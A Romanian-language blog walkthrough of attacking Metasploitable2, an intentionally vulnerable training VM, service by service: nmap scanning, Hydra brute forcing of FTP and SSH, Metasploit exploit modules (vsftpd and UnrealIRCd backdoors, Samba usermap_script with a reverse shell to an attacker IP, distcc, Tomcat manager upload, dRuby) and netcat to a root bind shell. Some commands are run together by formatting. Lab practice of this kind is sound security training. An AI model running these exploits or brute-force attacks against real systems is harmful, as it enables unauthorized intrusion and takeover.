Metasploitable2

Metasploitable este o mașină virtuală Linux vulnerabilă în mod intenționat.

Această mașină virtuală poate fi utilizată pentru a efectua cursuri de instruire în domeniul securității, pentru a testa instrumente de securitate și pentru a exersa tehnici comune de testare a penetrării.

Instalare și configurare

Suntem aici pentru a exploata Metasploitable 2 (Damn machine vulnerabilă pentru teste de penetrare)

Obțineți această mașină Metasploiable2 de la https://information.rapid7.com/download-metasploitable-2017.html

Proces de instalare:

  1. Deschideți VirtualBox și faceți clic pe butonul „New” pentru a crea o nouă mașină virtuală
  2. Tastați numele mașinii virtuale (Metasploitable2)
  3. Alocarea cantității de memorie (de preferat, dar nu mai mică de 512mb)
  4. Selectați Use an existing hard disk file
  5. Selectați fișierul vmdk pe care l-ați descărcat de la Rapid7
  6. Click pe Create…!!! Ați instalat cu succes Metasploitable2, Acum este timpul să configurați setările de rețea.

După instalare modificați setările adaptorului de rețea după cum urmează :

In-Network Setting: Settings/Network/Adapter (Setări/Rețea/Adaptor) Selectați Ethernet sau Wireless

În fila Advanced (Avansat) Selectați: Promiscuous Mode ca Allow All

Reporniți mașina Metasploitable2 și încercați să vă conectați folosind acreditările date pe Banner…!!!!!

Descoperiți adresa IP a mașinii folosind următoarele comandă în terminal

ifconfig

Asta este tot pentru configurare….Să începem hacking-ul…

Scanare

Scanare Matasploitable 2

Așa cum am observat adresa IP a mașinii este 192.168.0.130

Să începem scanarea cu Nmap care face parte din Kali Linux

nmap -sV -p- 192.168.0.130

Exploatarea tuturor porturilor în diferite tehnici :

Metoda 1:

Login cu Anonymous ca nume de utilizator și fără parolă.

Dacă aveți nevoie de mai multe informații despre Anonymous FTP le puteți găsi aici.

https://whatis.techtarget.com/definition/anonymous-FTP-File-Transfer-Protocol

ftp 192.168.0.130

Metoda 2 :

Prin Brute-force folosind Hydra dar trebuie să aveți o listă personalizată de nume de utilizator și parole.

hydra -L /root/Desktop/USERNAMES.txt -P /root/Desktop/PASSWORDS.txt <Target IP Address> ftp -V

Se va lua fiecare nume de utilizator și parolă din fișierele date și va încerca să se conecteze la serviciul FTP țintă.

După ce ați găsit acreditările, vă puteți conecta direct.

După ce vă conectați la un cont de utilizator, puteți obține acces root prin escaladarea privilegiilor.

Metoda 3 :

Exploatarea FTP prin intermediul cadrului Metasploit

deschideți consola cadrului Metasploit și căutați vsftpd Backdoor exploit

msfconsole
Search vsftpd
use exploit/unix/ftp/vsftpd_234_backdoor

.

show options

set RHOSTS 192.168.0.130 --> <target IP address>exploit

Felicitări, ați obținut acces root

22-SSH

Secure Shell (SSH) este un protocol de rețea criptografic pentru operarea în siguranță a serviciilor de rețea pe o rețea nesecurizată.

Exploatarea SSH în diferite tehnici

Metoda 1

Cravarea numelui de utilizator și a parolei cu Hydra

Hydra este un instrument încorporat în Kali-Linux utilizat pentru Atacul prin forță brută este o metodă de încercare și eroare utilizată de programele de aplicații pentru a decoda date criptate, cum ar fi parolele sau cheile Data Encryption Standard (DES), prin efort exhaustiv (utilizând forța brută), mai degrabă decât prin utilizarea unor strategii intelectuale.

hydra -L <Usernames_List> -P <Passwords_List> <Target ip address> <Service>

Metoda 2

Deschideți cadrul Metasploit

Deschideți terminalul și tastați aceste comenzi :

service postgresql startmsfconsolesearch ssh_loginuse auxiliary/scanner/ssh/ssh_login

Setați acest auxiliar și vedeți ce cere.

set RHOSTS <target IP Address> --> in my case 192.168.0.130

Setați lista predefinită de nume de utilizator și lista de parole

set USER_FILE <Username file Path>set PASS_FILE <Password file Path>exploit

Se va lua pe bază de timp numele de utilizator și lista de parole și va notifica cu numele de utilizator: parola și se va conecta cu aceste acreditări.

ssh username@targetipaddress

Aveți acces de utilizator, nu puteți efectua toate sarcinile, așa că încercați să obțineți acces root prin escaladarea privilegiilor.

23-TELNET

Telnet este un protocol de rețea simplu, bazat pe text, care este utilizat pentru accesarea calculatoarelor de la distanță prin intermediul rețelelor TCP/IP, cum ar fi Internetul. Telnet a fost creat și lansat în 1969 și, din punct de vedere istoric, se poate spune că a fost primul Internet.

telnet <target IP Address> --> 192.168.0.130

În mod implicit se va apuca bannerul Metasploitable 2, se arată că Login with msfadmin/msfadmin to get a start. Doar introduceți aceste credențiale și ați intrat.

25-SMTP

SMTP face parte din stratul de aplicație al protocolului TCP/IP. Folosind un proces numit „store and forward” (stocarea și transmiterea), SMTP deplasează e-mailul dvs. pe și între rețele. Acesta colaborează îndeaproape cu ceea ce se numește Mail Transfer Agent (MTA) pentru a vă trimite comunicarea către computerul și căsuța de e-mail potrivite.

Metoda 1:

Utilizarea lui Metasploit

Porniți Metasploit executând comenzile

service postgresql startmsfconsole -qsearch smtp_version

.

use auxiliary/scanning/smtp/smtp_version (or) you can type use 0show optionsset RHOST 192.168.0.130exploit (or) runshow optionsset RHOST 192.168.0.130exploit (or) run

SMTP înseamnă Simple Mail Transport Protocol (protocolul simplu de transport al corespondenței) și este un server-to-server și păstrează o bază de date locală a utilizatorilor către care trebuie să trimită și să primească e-mailuri.

SMTP are un set de comenzi. Ne vom conecta la ținta noastră cu „netcat” prin portul 25 și vom încerca să achiziționăm această bază de date de emailuri.

Deschideți un nou terminal și tastați:

nc 192.168.0.130 25

Acum conexiunea este stabilită, puteți verifica prin comenzile „SMTP”

Type: vrfy user

vrfy (Aceasta este o comandă nonshell interactiv)

Pentru comenzi SMTP vizitați: http://www.tcpipguide.com/free/t_SMTPCommands-2.htm

Metoda 2

Utilizarea smtp_enum

Acest lucru poate fi făcut de Metasploit

search smtp_enum

.

use auxiliary/scanner/smtp/smtp_enum

show optionsset RHOST 192.168.0.130exploit

Această metodă utilizează enumerarea pentru a afla această listă de utilizatori în serviciul SMTP.

Mai târziu, NetCat poate fi de ajutor pentru a obține o conexiune inversă cu acel utilizator.

139&445 Netbios-SSN

Samba este un proiect open-source care este utilizat pe scară largă pe computerele Linux și Unix, astfel încât acestea să poată lucra cu serviciile de fișiere și de imprimare Windows.

Potem utiliza Samba chiar și ca server Active pentru a gestiona logarea, autentificarea și controlul accesului pentru o rețea Windows.

Cercetați exploit

use exploit/multi/samba/usermap_script

.

Pentru a vizualiza opțiunile pentru exploit

show optionsSet RHOST192.168.0.130 (Target IP address)

.

Setează sarcina utilă

Show payloadsSet payload cmd/unix/reverse
Show payloadsSet payload cmd/unix/reverse

Setează argumentele necesare pentru sarcina utilă

.

Show optionsSet LHOST 192.168.0.109 (Attackers IP Address)Set LPORT 4444

Verifică odată ce toate argumentele necesare sunt completate

exploit

1099-Java-RMI

Remote Method Invocation (RMI) este o API care permite unui obiect să invoce o metodă asupra unui obiect care există într-un alt spațiu de adrese, care poate fi pe aceeași mașină sau pe o mașină la distanță.

Exploiting java-RMI-server

cercetați exploit-ul

search java_rmi_server

Alegeți exploit-ul în funcție de rangul lor. de exemplu, „excelent” funcționează mai bine decât „normal”.

use exploit/multi/misc/java_rmi_servershow optionsset RHOSTS <target's IP>exploit

Am obținut acces la mașina-țintă.

1524-BINDSHELL

Bind shell este un tip de shell în care mașina-țintă deschide un port de comunicare sau un listener pe mașina victimă și așteaptă o conexiune de intrare. Atacatorul se conectează apoi la ascultătorul de pe mașina victimă, ceea ce duce apoi la executarea de coduri sau comenzi pe server.

Exploatare

Este un shell root, astfel încât ne putem conecta prin serviciul netcat.

nc <target ip address> 1524

Felicitări, Sunteți un utilizator root acum.

2121-ProFTPD

Înainte de a exploata acest port trebuie să aveți acreditările de conectare, așa cum știm metoda obțineți-o prin tehnica Brute-force, Putem accesa ProFTPd cu telnet, Folosim aici user: user.

telnet <Taget IP Address> <Port Number>USER <username>
PASS <password>

Este un utilizator normal, Încercați escaladarea privilegiilor pentru a obține controlul root.

3306-MYSQL

Metoda 1:

Căutați exploit-ul

search scanner/mysql/mysql_login

use auxiliary/scanner/mysql/mysql_login

.

Cîteodată ar putea exista o șansă de a avea o parolă goală pentru MySQL. Așa că o putem exploata direct.

Nota: în mod implicit, arată BLANK_PASSWORDS ca fiind falsă, setați-o la true.

set BLANK_PASSWORDS as true

Metoda:2

În această metodă, vom exploata MySQL prin utilizarea acestei comenzi, furnizând numele de utilizator ca root și IP-ul țintei.

mysql -u root -h <target's IP>

3632-DISTCCD

Distcc este un instrument pentru accelerarea compilării codului sursă prin utilizarea calculului distribuit într-o rețea de calculatoare. Cu o configurație corectă

distcc poate reduce drastic timpul de compilare a unui proiect

Exploatarea portului 3632 folosind distcc-exec

Deschideți msfconsole și căutați distcc_exec

search distcc_execshow options

Setați argumentele necesare pentru a exploata

set RHOSTS <target-ip>exploit

Avem acces la Shell…încercați să faceți escaladarea privilegiilor pentru privilegii mai mari

Exploatarea PostgreSQL cu postgre_payload

Deschideți msfconsole & căutați postgres_payload

.

search postgres_payloaduse exploit/linux/postgres/postgres_payloadshow options

Setați argumentele necesare pentru exploit

set RHOSTS <target-ip>

În mod implicit, se va folosi numele de utilizator ca fiind postgres

exploit

Succesfully logged in postgresql…Să obținem un shell pentru a face mai multe lucruri…

Încercați să faceți o escaladare de privilegii…Învățare fericită..!!!

5900-VNC

Deschideți msfconsole și căutați exploit vnc_login

search vnc_loginuse auxiliary/scanner/vnc/vnc_login

show optionsset RHOSTS <targets IP>set PASS_FILE <filepath that contains passwords>run (or) exploit
.

Această metodă este utilizată pentru a exploata software-ul VNC găzduit pe sisteme de operare Linux sau Unix sau Windows cu vulnerabilitate de autentificare.

Încercați să vă conectați vnc cu acea parolă

Deschideți Vnc Viewer în Terminal & Tastați adresa IP și conectați-vă

a login prompt popup și cere să se furnizeze acreditările

Apoi introduceți parola și faceți clic pe OK.

Voilaaa…!!!! ai Acces…Știu la ce te gândești chiar acum…Nu te juca cu lucrurile din jur..Happy Learning.

6000-X11

Sistemul X Window (aka X) este un sistem de ferestre pentru afișaje bitmap, care este comun pe sistemele de operare bazate pe UNIX. X oferă cadrul de bază pentru un mediu bazat pe GUI.

Serverul X11 la distanță acceptă conexiuni de oriunde se poate obține o conexiune la Internet. Acesta este responsabil pentru accesul la plăcile grafice, la dispozitivele de intrare și la ecranul de afișare pe oricare dintre calculatoare sau dispozitive fără fir.

Exploatarea portului 6000 folosind ssh

ssh -X -l msfadmin 192.168.0.122

În comanda de mai sus, ‘X’ activează toate porturile de redirecționare, furnizând numele de utilizator și IP-ul țintei ne oferă shell-ul

6667 & 6697 UnrealIRCD

UnrealIRCd este un server IRC cu sursă deschisă, care deservește mii de rețele din 1999. Rulează pe Linux, OS X și Windows

UnrealIRCd este un IRCd foarte avansat, cu un accent puternic pe modularitate, un fișier de configurare avansat și foarte ușor de configurat. Caracteristicile cheie includ SSL

UnrealIRCd este unul dintre cele mai populare și complete daemoni IRC și este folosit pe cel mai mare număr de servere IRC

Acest server este descris ca având probabil cele mai multe caracteristici de securitate dintre toate serverele IRC.

Protocoale folosite: Internet Relay Chat

Să exploatăm acest server IRC.

Metoda 1: pe portul 6667

search unrealircduse exploit/unix/irc/unreal_ircd_3281_backdoorshow options
search unrealircduse exploit/unix/irc/unreal_ircd_3281_backdoorshow options

Stabilește argumentele necesare pentru exploatare

set RHOSTS <target-ip>

.

în mod implicit, numărul de port 6667 este atribuit lui exploit

run (or) exploit

Heyyy…Avem rădăcină…Trăim pe muchie de cuțit…

Metoda 2: Pe portul 6697

Utilizați exploit-ul de mai sus și setați argumentele necesare

  • De data aceasta setați portul ca fiind 6697
set RHOSTS <target-ip>set RPORT 6697

Și a doua oară, de asemenea, am obținut root…Încercați să exploatați acest lucru…Happy learning

818080-TOMCAT

Apache Tomcat este o implementare open-source a tehnologiilor Java Servlet, JavaServer Pages, Java Expression Language și WebSocket. Tomcat oferă un mediu de server web HTTP „pur Java” în care poate rula cod Java.

Exploatarea Apache-Tomcat

Se poate realiza în doi pași:

Deschideți msfconsole & căutați tomcat_mgr_login

search tomcat_mgr_loginset RHOSTS <target-ip>

show options

Exploitul va atribui nume de utilizator implicit & liste de parole. După setarea argumentelor pentru exploit Tip exploit (sau) executați

run

Se iau același nume de utilizator și aceeași parolă și se dau la următorul exploit.

cercetați Tomcat Manager Exploits

search tomcat_mgr_uploaduse exploit/multi/http/tomcat_mgr_uploadshow options

Setați RHOSTS, RPORT, și HttpPassword, HttpUsername pe care le-am obținut din Tomcat login exploit și apoi rulați exploit-ul.

msfconsole ar putea atribui sarcina utilă adecvată pentru un exploit, De aceea avem meterpreter…

8787-Ruby-drb

dRuby este un sistem distribuit de obiecte pentru Ruby. Este scris în Ruby pur și folosește protocolul său.

Nu sunt necesare servicii suplimentare în afară de cele furnizate de timpul de execuție Ruby, cum ar fi socket-urile TCP.

search drb_remote_codeexec

Setați argumentele necesare pentru a exploata

show optionsset RHOSTS <target-ip>exploit (or) run

Felicitări că ați obținut acces shell root…încercați să folosiți câteva comenzi shell.

.

Lasă un răspuns

Adresa ta de email nu va fi publicată.